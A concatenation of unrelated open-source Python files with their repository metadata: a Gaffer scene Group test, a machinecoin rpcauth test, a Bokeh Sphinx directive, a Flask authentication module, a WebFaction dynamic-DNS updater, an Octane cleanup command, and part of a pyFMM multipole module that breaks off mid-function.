self.assertEqual( group["out"].childNames( "/topLevel/myLovelyObject2" ), IECore.InternedStringVectorData() )
def testNameClashesWithThreading( self ) :
sphere = IECore.SpherePrimitive()
input1 = GafferSceneTest.CompoundObjectSource()
input1["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( sphere.bound() ),
"children" : {
"myLovelyObject1" : {
"bound" : IECore.Box3fData( sphere.bound() ),
"object" : sphere,
},
},
} ),
)
plane = IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
input2 = GafferSceneTest.CompoundObjectSource()
input2["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( plane.bound() ),
"children" : {
"myLovelyObject1" : {
"bound" : IECore.Box3fData( plane.bound() ),
"object" : plane,
},
},
} ),
)
group = GafferScene.Group()
group["name"].setValue( "topLevel" )
group["in"].setInput( input1["out"] )
group["in1"].setInput( input2["out"] )
sceneProcedural = GafferScene.SceneProcedural( group["out"], Gaffer.Context(), "/" )
for i in range( 0, 1000 ) :
mh = IECore.CapturingMessageHandler()
with mh :
# we use a CapturingRenderer as it will invoke the procedural
# on multiple threads for us automatically.
renderer = IECore.CapturingRenderer()
with IECore.WorldBlock( renderer ) :
renderer.procedural( sceneProcedural )
self.assertEqual( len( mh.messages ), 0 )
def testHashes( self ) :
p = GafferScene.Plane()
g = GafferScene.Group()
g["in"].setInput( p["out"] )
self.assertSceneValid( g["out"] )
self.assertPathHashesEqual( g["out"], "/group/plane", p["out"], "/plane" )
def testGlobalsPassThrough( self ) :
p = GafferScene.Plane()
g = GafferScene.Group()
g["in"].setInput( p["out"] )
self.assertEqual( g["out"]["globals"].hash(), p["out"]["globals"].hash() )
self.assertTrue( g["out"]["globals"].getValue( _copy = False ).isSame( p["out"]["globals"].getValue( _copy = False ) ) )
def testTransformHash( self ) :
p = GafferScene.Plane()
g1 = GafferScene.Group()
g1["in"].setInput( p["out"] )
g2 = GafferScene.Group()
g2["in"].setInput( p["out"] )
self.assertSceneHashesEqual( g1["out"], g2["out"] )
g2["transform"]["translate"].setValue( IECore.V3f( 1, 0, 0 ) )
self.assertSceneHashesEqual( g1["out"], g2["out"], pathsToIgnore = ( "/", "/group", ) )
self.assertSceneHashesEqual( g1["out"], g2["out"], childPlugNamesToIgnore = ( "transform", "bound" ) )
self.assertNotEqual( g1["out"].transformHash( "/group" ), g2["out"].transformHash( "/group" ) )
self.assertEqual( g1["out"].boundHash( "/group" ), g2["out"].boundHash( "/group" ) )
self.assertNotEqual( g1["out"].boundHash( "/" ), g2["out"].boundHash( "/" ) )
def testChildNamesHash( self ) :
p = GafferScene.Plane()
g1 = GafferScene.Group()
g1["in"].setInput( p["out"] )
g2 = GafferScene.Group()
g2["in"].setInput( p["out"] )
self.assertSceneHashesEqual( g1["out"], g2["out"] )
g2["name"].setValue( "stuff" )
equivalentPaths = [
( "/", "/" ),
( "/group", "/stuff" ),
( "/group/plane", "/stuff/plane" ),
]
for path1, path2 in equivalentPaths :
self.assertEqual( g1["out"].boundHash( path1 ), g2["out"].boundHash( path2 ) )
self.assertEqual( g1["out"].transformHash( path1 ), g2["out"].transformHash( path2 ) )
self.assertEqual( g1["out"].objectHash( path1 ), g2["out"].objectHash( path2 ) )
self.assertEqual( g1["out"].attributesHash( path1 ), g2["out"].attributesHash( path2 ) )
if path1 is not "/" :
self.assertEqual( g1["out"].childNamesHash( path1 ), g2["out"].childNamesHash( path2 ) )
else :
self.assertNotEqual( g1["out"].childNamesHash( path1 ), g2["out"].childNamesHash( path2 ) )
def testWithCacheDisabled( self ) :
Gaffer.ValuePlug.setCacheMemoryLimit( 0 )
p = GafferScene.Plane()
g1 = GafferScene.Group()
g1["in"].setInput( p["out"] )
self.assertSceneValid( g1["out"] )
def testAffects( self ) :
p = GafferScene.Plane()
g = GafferScene.Group()
g["in"].setInput( p["out"] )
for c in g["in"].children() :
a = g.affects( c )
self.assertEqual( len( a ), 1 if c.getName() != "childNames" else 2 )
self.assertEqual( a[0].fullName(), "Group.out." + c.getName() )
def testGroupInABox( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["g1"] = GafferScene.Group()
s["g2"] = GafferScene.Group()
s["g1"]["in"].setInput( s["p"]["out"] )
s["g2"]["in"].setInput( s["g1"]["out"] )
s.selection().add( s["g1"] )
b = Gaffer.Box.create( s, s.selection() )
self.assertEqual( len( b ), 4 ) # one for the user plug, one for the child, one for the input and one for the output
self.assertTrue( b["g1"]["in"].getInput().isSame( b["in"] ) )
self.assertTrue( b["in"].getInput().isSame( s["p"]["out"] ) )
self.assertTrue( s["g2"]["in"].getInput().isSame( b["out"] ) )
self.assertTrue( b["out"].getInput().isSame( b["g1"]["out"] ) )
# this test was causing crashes elsewhere when the script
# was finally garbage collected, so we force the collection
# here so we can be sure the problem is fixed.
del s
del b
while gc.collect() :
pass
IECore.RefCounted.collectGarbage()
def testSetsWithRenaming( self ) :
l1 = GafferSceneTest.TestLight()
l2 = GafferSceneTest.TestLight()
g = GafferScene.Group()
g["in"].setInput( l1["out"] )
g["in1"].setInput( l2["out"] )
lightSet = g["out"].set( "__lights" )
self.assertEqual(
set( lightSet.value.paths() ),
set( [
"/group/light",
"/group/light1",
] )
)
self.assertSceneValid( g["out"] )
g2 = GafferScene.Group()
g2["in"].setInput( g["out"] )
lightSet = g2["out"].set( "__lights" )
self.assertEqual(
set( lightSet.value.paths() ),
set( [
"/group/group/light",
"/group/group/light1",
] )
)
def testDisabled( self ) :
p1 = GafferScene.Plane()
p2 = GafferScene.Plane()
g = GafferScene.Group()
g["in"].setInput( p1["out"] )
g["in1"].setInput( p2["out"] )
self.assertSceneValid( g["out"] )
self.assertEqual( g["out"].childNames( "/" ), IECore.InternedStringVectorData( [ "group" ] ) )
g["enabled"].setValue( False )
self.assertSceneValid( g["out"] )
self.assertEqual( g["out"].childNames( "/" ), IECore.InternedStringVectorData( [ "plane" ] ) )
self.assertScenesEqual( g["out"], p1["out"] )
def testSetsWithDiamondInput( self ) :
# l
# | \
# | \
# lg1 lg2
# | /
# | /
# g
l = GafferSceneTest.TestLight()
lg1 = GafferScene.Group()
lg1["name"].setValue( "lightGroup1" )
lg1["in"].setInput( l["out"] )
lg2 = GafferScene.Group()
lg2["name"].setValue( "lightGroup2" )
lg2["in"].setInput( l["out"] )
self.assertEqual( lg1["out"]["globals"].hash(), lg2["out"]["globals"].hash() )
g = GafferScene.Group()
g["in"].setInput( lg1["out"] )
g["in1"].setInput( lg2["out"] )
lightSet = g["out"].set( "__lights" )
self.assertEqual(
set( lightSet.value.paths() ),
set( [
"/group/lightGroup1/light",
"/group/lightGroup2/light",
] )
)
def testMakeConnectionAndUndo( self ) :
s = Gaffer.ScriptNode()
s["c"] = GafferScene.Plane()
s["g"] = GafferScene.Group()
s["g"]["__customPlug"] = Gaffer.V2fPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
with Gaffer.UndoContext( s ) :
s["g"]["in"].setInput( s["c"]["out"] )
self.assertTrue( "__customPlug" in s["g"] )
self.assertTrue( "in" in s["g"] )
self.assertTrue( "in1" in s["g"] )
s.undo()
self.assertTrue( "__customPlug" in s["g"] )
self.assertTrue( "in" in s["g"] )
self.assertFalse( "in1" in s["g"] )
def testDeleteInputsAndSerialise( self ) :
s = Gaffer.ScriptNode()
s["s"] = GafferScene.Sphere()
s["c"] = GafferScene.Camera()
s["p"] = GafferScene.Plane()
s["t"] = GafferScene.Transform()
s["p1"] = GafferScene.Plane()
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["s"]["out"] )
s["g"]["in1"].setInput( s["c"]["out"] )
s["g"]["in2"].setInput( s["p"]["out"] )
s["g"]["in3"].setInput( s["t"]["out"] )
s["g"]["in4"].setInput( s["p1"]["out"] )
s.deleteNodes( filter = Gaffer.StandardSet( [ s["s"], s["p"], s["p1"] ] ) )
ss = s.serialise()
s2 = Gaffer.ScriptNode()
s2.execute( ss )
def testDifferentSetsInEachInput( self ) :
p1 = GafferScene.Plane()
s1 = GafferScene.Set()
s1["name"].setValue( "s1" )
s1["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s1["in"].setInput( p1["out"] )
p2 = GafferScene.Plane()
s2 = GafferScene.Set()
s2["name"].setValue( "s2" )
s2["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s2["in"].setInput( p2["out"] )
g = GafferScene.Group()
g["in"].setInput( s1["out"] )
g["in1"].setInput( s2["out"] )
self.assertEqual( g["out"]["setNames"].getValue(), IECore.InternedStringVectorData( [ "s1", "s2" ] ) )
self.assertEqual(
g["out"].set( "s1" ).value,
GafferScene.PathMatcher( [ "/group/plane" ] )
)
self.assertEqual(
g["out"].set( "s2" ).value,
GafferScene.PathMatcher( [ "/group/plane1" ] )
)
def testNextInPlug( self ) :
g = GafferScene.Group()
self.assertTrue( g.nextInPlug().isSame( g["in"] ) )
p = GafferScene.Plane()
g["in"].setInput( p["out"] )
self.assertTrue( g.nextInPlug().isSame( g["in1"] ) )
g["in"].setInput( None )
self.assertTrue( g.nextInPlug().isSame( g["in"] ) )
g["in"].setInput( p["out"] )
g["in1"].setInput( p["out"] )
self.assertTrue( g.nextInPlug().isSame( g["in2"] ) )
g["in"].setInput( None )
self.assertTrue( g.nextInPlug().isSame( g["in2"] ) )
def testUpdateWhenInputSetChanges( self ) :
p = GafferScene.Plane()
c = GafferScene.Cube()
g1 = GafferScene.Group()
g1["in"].setInput( p["out"] )
g1["in1"].setInput( c["out"] )
s = GafferScene.Set()
s["in"].setInput( g1["out"] )
s["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
g2 = GafferScene.Group()
g2["in"].setInput( s["out"] )
h = g2["out"].setHash( "set" )
self.assertEqual( g2["out"].set( "set" ).value.paths(), [ "/group/group/plane" ] )
s["paths"].setValue( IECore.StringVectorData( [ "/group/cube" ] ) )
self.assertNotEqual( g2["out"].setHash( "set" ), h )
self.assertEqual( g2["out"].set( "set" ).value.paths(), [ "/group/group/cube" ] )
def setUp( self ) :
self.__originalCacheMemoryLimit = Gaffer.ValuePlug.getCacheMemoryLimit()
def tearDown( self ) :
Gaffer.ValuePlug.setCacheMemoryLimit( self.__originalCacheMemoryLimit )
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "20d9d972912b10ad912148a119159b5d",
"timestamp": "",
"source": "github",
"line_count": 734,
"max_line_length": 147,
"avg_line_length": 33.31880108991825,
"alnum_prop": 0.6338321884200196,
"repo_name": "goddardl/gaffer",
"id": "014604dbf4ae5c83682e62d8a5c5f605bfa5eae9",
"size": "26316",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/GafferSceneTest/GroupTest.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "2228"
},
{
"name": "C++",
"bytes": "4178625"
},
{
"name": "GLSL",
"bytes": "6250"
},
{
"name": "Python",
"bytes": "4152621"
},
{
"name": "Shell",
"bytes": "8787"
},
{
"name": "Slash",
"bytes": "36371"
}
],
"symlink_target": ""
} |
"""Test share/rpcauth/rpcauth.py
"""
import base64
import configparser
import hmac
import importlib
import os
import sys
import unittest
class TestRPCAuth(unittest.TestCase):
def setUp(self):
config = configparser.ConfigParser()
config_path = os.path.abspath(
os.path.join(os.sep, os.path.abspath(os.path.dirname(__file__)),
"../config.ini"))
with open(config_path, encoding="utf8") as config_file:
config.read_file(config_file)
sys.path.insert(0, os.path.dirname(config['environment']['RPCAUTH']))
self.rpcauth = importlib.import_module('rpcauth')
def test_generate_salt(self):
self.assertLessEqual(len(self.rpcauth.generate_salt()), 32)
self.assertGreaterEqual(len(self.rpcauth.generate_salt()), 16)
def test_generate_password(self):
password = self.rpcauth.generate_password()
expected_password = base64.urlsafe_b64encode(
base64.urlsafe_b64decode(password)).decode('utf-8')
self.assertEqual(expected_password, password)
def test_check_password_hmac(self):
salt = self.rpcauth.generate_salt()
password = self.rpcauth.generate_password()
password_hmac = self.rpcauth.password_to_hmac(salt, password)
m = hmac.new(bytearray(salt, 'utf-8'),
bytearray(password, 'utf-8'), 'SHA256')
expected_password_hmac = m.hexdigest()
self.assertEqual(expected_password_hmac, password_hmac)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "1a890ee37dc672c631a6a6e2ecbb2140",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 77,
"avg_line_length": 34.86363636363637,
"alnum_prop": 0.6564537157757496,
"repo_name": "machinecoin-project/machinecoin",
"id": "78f258532f2e8a32dc60efff0c8d01530c3caf3e",
"size": "1752",
"binary": false,
"copies": "2",
"ref": "refs/heads/0.17",
"path": "test/util/rpcauth-test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7639"
},
{
"name": "C",
"bytes": "342684"
},
{
"name": "C++",
"bytes": "3521961"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "Groff",
"bytes": "18048"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "Makefile",
"bytes": "66797"
},
{
"name": "Objective-C",
"bytes": "2023"
},
{
"name": "Objective-C++",
"bytes": "7246"
},
{
"name": "Protocol Buffer",
"bytes": "2308"
},
{
"name": "Python",
"bytes": "211880"
},
{
"name": "QMake",
"bytes": "2019"
},
{
"name": "Shell",
"bytes": "40513"
}
],
"symlink_target": ""
} |
""" Publish all Bokeh release notes on to a single page.
This directive collect all the release notes files in the ``docs/releases``
subdirectory, and includes them in *reverse version order*. Typical usage:
.. code-block:: rest
:tocdepth: 1
.. toctree::
.. bokeh-releases::
To avoid warnings about orphaned files, add the following to the Sphinx
``conf.py`` file:
.. code-block:: python
exclude_patterns = ['docs/releases/*']
"""
# -----------------------------------------------------------------------------
# Boilerplate
# -----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
# Standard library imports
from os import listdir
from os.path import join
# External imports
from packaging.version import Version as V
# Bokeh imports
from bokeh import __version__
from bokeh.resources import get_sri_hashes_for_version
# Bokeh imports
from .bokeh_directive import BokehDirective
# -----------------------------------------------------------------------------
# Globals and constants
# -----------------------------------------------------------------------------
__all__ = ("BokehReleases", "setup")
# -----------------------------------------------------------------------------
# General API
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Dev API
# -----------------------------------------------------------------------------
_SRI_SECTION = """
Subresource Integrity Hashes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The SRI Hashes for version ``%s`` are given in the table below:
.. csv-table::
:widths: 20, 80
:header: "Filename", "Hash"
"""
class BokehReleases(BokehDirective):
def run(self):
env = self.state.document.settings.env
app = env.app
rst = []
versions = [x.rstrip(".rst") for x in listdir(join(app.srcdir, "docs", "releases"))]
versions.sort(key=V, reverse=True)
for v in versions:
rst_text = f".. include:: releases/{v}.rst"
try:
hashes = get_sri_hashes_for_version(v)
rst_text += _SRI_SECTION % v
for key, val in sorted(hashes.items()):
rst_text += f" ``{key}``, ``{val}``\n"
except KeyError:
if v == __version__:
raise RuntimeError(f"Missing SRI Hash for full release version {v!r}")
entry = self._parse(rst_text, "<bokeh-releases>")
rst.extend(entry)
return rst
def setup(app):
""" Required Sphinx extension setup function. """
app.add_directive("bokeh-releases", BokehReleases)
# -----------------------------------------------------------------------------
# Private API
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Code
# -----------------------------------------------------------------------------
| {
"content_hash": "f0695bebc83a63e3d10c4e68123b60d3",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 92,
"avg_line_length": 29.15929203539823,
"alnum_prop": 0.404855842185129,
"repo_name": "ericmjl/bokeh",
"id": "8094e7e6a38871e674648c8ff47a524e48d9e7cc",
"size": "3628",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bokeh/sphinxext/bokeh_releases.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1442"
},
{
"name": "CSS",
"bytes": "102094"
},
{
"name": "CoffeeScript",
"bytes": "462899"
},
{
"name": "HTML",
"bytes": "46193"
},
{
"name": "JavaScript",
"bytes": "24563"
},
{
"name": "Makefile",
"bytes": "1150"
},
{
"name": "Python",
"bytes": "2705341"
},
{
"name": "Shell",
"bytes": "8995"
},
{
"name": "TypeScript",
"bytes": "1468288"
}
],
"symlink_target": ""
} |
from flask import g, jsonify
from flask_httpauth import HTTPBasicAuth
from ..models import User, AnonymousUser
from . import api
from .errors import unauthorized, forbidden
auth = HTTPBasicAuth()
@auth.verify_password
def verify_password(email, password):
if email == '':
g.current_user = AnonymousUser()
return True
user = User.query.filter_by(email = email).first()
if not user:
return False
g.current_user = user
return user.verify_password(password)
@auth.error_handler
def auth_error():
return unauthorized('Invalid credentials')
@api.before_request
@auth.login_required
def before_request():
if not g.current_user.is_anonymous and \
not g.current_user.confirmed:
return forbidden('Unconfirmed account')
@auth.verify_password
def verify_password(email_or_token, password):
if email_or_token == '':
g.current_user = AnonymousUser()
return True
if password == '':
g.current_user = User.verify_auth_token(email_or_token)
g.token_used = True
return g.current_user is not None
user = User.query.filter_by(email=email_or_token).first()
if not user:
return False
g.current_user = user
g.token_used = False
return user.verify_password(password)
@api.route('/token')
def get_token():
if g.current_user.is_anonymous or g.token_used:
return unauthorized('Invalid credentials')
return jsonify({'token': g.current_user.generate_auth_token(
expiration=3600), 'expiration': 3600}) | {
"content_hash": "4e47cfc856841223f092af367305cd63",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 64,
"avg_line_length": 29.24074074074074,
"alnum_prop": 0.6649778340721976,
"repo_name": "Tuklab/tuklab101",
"id": "11071f3736deee12b9b30359bc74873c6de7a6ee",
"size": "1579",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/api_1_0/authentication.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1855"
},
{
"name": "HTML",
"bytes": "16885"
},
{
"name": "Makefile",
"bytes": "413"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "79248"
},
{
"name": "Shell",
"bytes": "56705"
}
],
"symlink_target": ""
} |
"""
Update WebFaction DNS entry
Uses the WebFaction DNS API
http://docs.webfaction.com/xmlrpc-api/apiref.html#dns
"""
import getopt
import sys
import os
import subprocess
import traceback
import logging
import logging.handlers
import ConfigParser
import xmlrpclib
import urllib2
import re
__app__ = os.path.basename(__file__)
__author__ = "Gus E"
__copyright__ = "Copyright 2014"
__credits__ = ["Gus E"]
__license__ = "GPL"
__version__ = "1.2"
__maintainer__ = "Gus E"
__email__ = "gesquive@gmail"
__status__ = "Beta"
#--------------------------------------
# Configurable Constants
LOG_FILE = '/var/log/webfaction-ddns/' + os.path.splitext(__app__)[0] + '.log'
LOG_SIZE = 1024*1024*200
IP_CHECK_LIST = [
'http://icanhazip.com',
'http://whatismyip.akamai.com/',
'http://whatsmyip.me/',
'http://wtfismyip.com/text',
'http://api.ipify.org/',
'http://ip.catnapgames.com',
'http://ip.ryansanden.com',
]
verbose = False
debug = False
logger = logging.getLogger(__app__)
def usage():
usage = \
"""Usage: %s [options] forced_arg
Update WebFaction DNS entry
Options and arguments:
-h --help Prints this message.
-v --verbose Writes all messages to console.
-f --force-update Force an update regardless of the
update history.
-c --config <config_path> The config to use.
(default: ~/.config/webfaction-ddns.cfg)
v%s
""" % (__app__, __version__)
print usage
def main():
global verbose, debug
try:
opts, args = getopt.getopt(sys.argv[1:], "hvc:f", \
["help", "verbose", "debug", "config=", "force-update"])
except getopt.GetoptError, err:
print str(err)
print usage()
sys.exit(2)
verbose = False
debug = False
webfaction_username = None
webfaction_password = None
webfaction_domain = None
last_ip = None
config_path = get_config_path()
force_update = False
for o, a in opts:
if o in ("-c", "--config"):
if os.path.exists(a) and os.path.isfile(a):
config_path = a
else:
print "Error: cannot access '%s'" % a
sys.exit()
config = ConfigParser.ConfigParser()
if os.path.exists(config_path):
config.read(config_path)
webfaction_username = config.get("Account", "UserName").strip()
webfaction_password = config.get("Account", "Password").strip()
webfaction_domain = config.get("Account", "Domain").strip()
try:
last_ip = config.get("Local", "IP").strip()
except:
pass
else:
print "No config file exists, please fill in the following values."
try:
webfaction_username = raw_input("UserName: ").strip()
webfaction_password = raw_input("Password: ").strip()
webfaction_domain = raw_input("Domain: ").strip()
except (KeyboardInterrupt, SystemExit):
sys.exit()
dir_path = os.path.dirname(config_path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
config.add_section("Account")
config.set("Account", 'UserName', webfaction_username)
config.set("Account", 'Password', webfaction_password)
config.set("Account", 'Domain', webfaction_domain)
with open(config_path, 'wb') as configfile:
config.write(configfile)
for o, a in opts:
if o in ("-h", "--help"):
# Print out help and exit
usage()
sys.exit()
elif o in ("-d", "--debug"):
debug = True
elif o in ("-v", "--verbose"):
verbose = True
elif o in ("-f", "--force"):
force_update = True
log_file = LOG_FILE
dir_path = os.path.dirname(log_file)
# if not os.path.exists(dir_path):
# os.makedirs(dir_path)
if os.access(dir_path, os.W_OK):
file_handler = logging.handlers.RotatingFileHandler(log_file,
maxBytes=LOG_SIZE, backupCount=9)
file_formater = logging.Formatter('%(asctime)s,%(levelname)s,%(thread)d,%(message)s')
file_handler.setFormatter(file_formater)
logger.addHandler(file_handler)
if verbose:
console_handler = logging.StreamHandler(sys.stdout)
console_formatter = logging.Formatter("[%(asctime)s] %(levelname)-5.5s: %(message)s")
console_handler.setFormatter(console_formatter)
logger.addHandler(console_handler)
logger.addHandler(logging.NullHandler())
logger.setLevel(logging.DEBUG)
try:
current_ip = get_ip_address()
if force_update:
logger.info("Update forced from the command line")
update_dns(webfaction_username, webfaction_password,
webfaction_domain, config_path, current_ip)
update_config(config_path, config, current_ip)
elif last_ip != current_ip:
logger.info("IP Changed from '%s' to '%s' updating DNS" %
(last_ip, current_ip))
update_dns(webfaction_username, webfaction_password,
webfaction_domain, config_path, current_ip)
update_config(config_path, config, current_ip)
else:
logger.info("No changes.")
except (KeyboardInterrupt, SystemExit):
pass
except Exception, e:
print traceback.format_exc()
def get_config_path():
'''
Gets the config location based on the XDG Base Directory Specification.
If no config is found, the home directory path is returned.
'''
config_path = None
project_name = __app__.split('.')[0]
project_name = "webfaction-ddns"
config_name = project_name+".conf"
locations = [
os.path.join(os.curdir, config_name),
os.path.join(os.path.expanduser('~'), '.config', project_name, config_name),
os.path.join('/etc', project_name, config_name),
os.environ.get(project_name+"_CONF"),
]
for path in locations:
if path != None and os.path.exists(path) and os.path.isfile(path):
return path
return locations[1]
def update_config(config_path, config, current_ip):
if not config.has_section("Local"):
config.add_section("Local")
config.set("Local", 'IP', current_ip)
with open(config_path, 'wb') as configfile:
config.write(configfile)
def update_dns(webfaction_username, webfaction_password,
webfaction_domain, config_path, current_ip):
server = xmlrpclib.ServerProxy('https://api.webfaction.com/')
(session_id, account) = server.login(webfaction_username, webfaction_password)
home_override = None
for override in server.list_dns_overrides(session_id):
if override['domain'] == webfaction_domain:
home_override = override
break
if home_override and home_override['a_ip'] == current_ip:
logger.info("Remote DNS entry matches, no update needed")
return
if home_override:
server.delete_dns_override(session_id, webfaction_domain, home_override['a_ip'])
server.create_dns_override(session_id, webfaction_domain, current_ip)
logger.info("Successfully updated webfaction server")
def get_ip_address():
for site in IP_CHECK_LIST:
try:
content = urllib2.urlopen(site).read()
grab = re.findall('\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}',
content)
return grab[0]
except urllib2.URLError:
continue
except IndexError:
continue
logger.error("Can't reach any IP checking site.")
logger.debug("Are you sure you have internet access?")
return None
if __name__ == '__main__':
main()
| {
"content_hash": "da326d77ae5c695b1f2b80252cb4aaf5",
"timestamp": "",
"source": "github",
"line_count": 253,
"max_line_length": 93,
"avg_line_length": 31.58102766798419,
"alnum_prop": 0.5812265331664581,
"repo_name": "gesquive/webfaction-ddns",
"id": "a555c1752d193c6bee812a2c425947b73fbbe060",
"size": "8056",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "webfaction-ddns.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8056"
}
],
"symlink_target": ""
} |
import logging
import os
from cliff import command as cmd
from fuelclient import objects
from octane import magic_consts
from octane.util import env as env_util
from octane.util import ssh
LOG = logging.getLogger(__name__)
def cleanup_environment(env_id):
env = objects.Environment(env_id)
controller = env_util.get_one_controller(env)
sftp = ssh.sftp(controller)
admin_pass = env_util.get_admin_password(env, controller)
script_filename = 'clean_env.py'
with ssh.tempdir(controller) as tempdir:
script_src_filename = os.path.join(
magic_consts.CWD, "helpers", script_filename)
script_dst_filename = os.path.join(tempdir, script_filename)
sftp.put(script_src_filename, script_dst_filename)
command = [
'sh', '-c', '. /root/openrc; export OS_PASSWORD={0}; python {1}'
.format(admin_pass, script_dst_filename),
]
with ssh.popen(command, node=controller, stdin=ssh.PIPE) as proc:
roles = ["controller", "compute"]
for node in env_util.get_nodes(env, roles):
data = "{0}\n{1}\n".format(node.data['fqdn'].split('.')[0],
node.data['fqdn'])
proc.stdin.write(data)
class CleanupCommand(cmd.Command):
"""Cleanup upgraded environment"""
def get_parser(self, prog_name):
parser = super(CleanupCommand, self).get_parser(prog_name)
parser.add_argument(
'env', type=int, metavar='ENV_ID',
help="ID of environment to cleanup")
return parser
def take_action(self, parsed_args):
cleanup_environment(parsed_args.env)
| {
"content_hash": "f15b591d189b506c9a0d73394c2362d0",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 76,
"avg_line_length": 31.849056603773583,
"alnum_prop": 0.620260663507109,
"repo_name": "Mirantis/octane",
"id": "f8bd2d11bbbf6c24d1d68a0737df3cc7f504b204",
"size": "2234",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "octane/commands/cleanup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "204473"
},
{
"name": "Shell",
"bytes": "33878"
}
],
"symlink_target": ""
} |
"""
Implementacion of Upward and Downward pass. With combinatorics cache used.
"""
from numpy import *
from pyFMM.Kernels.translations import *
from pyFMM.DataStructure.quadtree import *
import time
def upwardStep1(quadtree, p, k):
'''
Upward pass Step 1:
Generation of the multipole expansion coefficients for
each box at the lowest level L
Input:
quadtree - quadtree structure that contains all the blobs ordered
p - truncation number
k - parameter of the blobs
'''
# Lowest level
L = quadtree.level
LowestLevel = quadtree.levels[L]
# Loop over all the nodes of the lowest level
for nodeB in LowestLevel:
# get the center of the node
Zc = nodeB.centerZ
# C = 0
C = zeros((p), complex)
# Constant of the vortex blobs (simplified to points... explaination on paper)
constant = -1j / (k * math.pi)
# Loop over all the blobs contained on nodeB
for i in range(len(nodeB.blobZ)):
# blob position
Zi = nodeB.blobZ[i]
# get the multipole expansion coef(MEC)
mec = MEC(p, Zi - Zc)
# add the contribution of this blob to the total
C = C + constant * dot(nodeB.blobCirculation[i], mec)
# Save the Multipole Expansion coefficients of the nodeB
nodeB.C = C.copy()
return
def upwardStep2(quadtree, p):
'''
Upward pass step 2:
Generation of the multipole expansions for every box at every level
starting at level L-1 to level 2 calculating the re-expansions coef
from the children s expansions in a recursive way.
Input:
quadtree - quadtree structure that contains all the blobs ordered
p - truncation number
'''
# Lowest level
L = quadtree.level
# Loop levels starting at L-1 to 2
levelsLoop = L + 1 - array(range(2,L))
for l in levelsLoop:
# loop over the nodes of the level
for nodeB in quadtree.levels[l]:
# get the center of the node
Zc = nodeB.centerZ
# Cnl = 0
C = zeros((p), complex)
# Loop over nodeB s children
for childB in nodeB.childs:
# get the children
child = quadtree.levels[l+1][childB]
# get the children center
Zc_child = child.centerZ
# calculate the multipole to multipole (M2M) translation matrix
m2m = M2M(p, Zc - Zc_child)
# add the contribution of this child to the total
C = C + dot(m2m, child.C)
# Save the Multipole Expansion coefficients of the nodeB
nodeB.C = C
return
def downwardStep1(quadtree, p):
'''
Downward Pass Step 1:
Conversion of a multpole expansion into a local expansion
Input:
quadtree - quadtree structure that contains all the blobs ordered
p - truncation number
'''
# Lowest level
L = quadtree.level
# Loop levels starting at 2 to L
levelsLoop = array(range(2, L + 1))
for l in levelsLoop:
# loop over the nodes of the level
for nodeB in quadtree.levels[l]:
# get the center of the node
Zc = nodeB.centerZ
# Dnl = 0
D = zeros((p), complex)
# Loop over nodeB s interaction list
for interactor in nodeB.interactionList:
# get the interactor
inter = quadtree.levels[l][interactor]
# get the interactor s center
Zc_inter = inter.centerZ
# calculate the multipole to local (M2L) translation matrix
m2l = M2L(p, Zc - Zc_inter)
# add the contribution of this interactor to the total
D = D + dot(m2l, inter.C)
# Save the Multipole Expansion coefficients of the nodeB
nodeB.D = D
return
def downwardStep2(quadtree, p):
'''
Downward Pass Step 2:
Translation of the local expansions.
Input:
quadtree - quadtree structure that contains all the blobs ordered
p - truncation number
'''
# Lowest level
L = quadtree.level
# Loop levels starting at 2 to L
levelsLoop = array(range(2, L + 1))
for l in levelsLoop:
# loop over the nodes of the level
for nodeB in quadtree.levels[l]:
if l == 2:
# nodes in level 2 doesn't have parents... skip step
nodeB.E = nodeB.D
else:
# get the center of the current node
Zc = nodeB.centerZ
# get the parent node
parent = quadtree.levels[l-1][nodeB.father]
# get the center of the parent node
Zc_parent = parent.centerZ
# calculate the local to local (L2L) translation matrix
l2l = L2L(p, Zc - Zc_parent)
# add the parent s contribution and nodeB s contributions to the total
nodeB.E = nodeB.D + dot(l2l, parent.E)
return
def evalVelocity2(circulation, Z, sigma2, k):
# local variables
size = len(Z)
velocity = zeros((size), complex)
# computation of common factors
c1 = -1/(k * sigma2)
c2 = 1j/(k * math.pi)
for i in range(size):
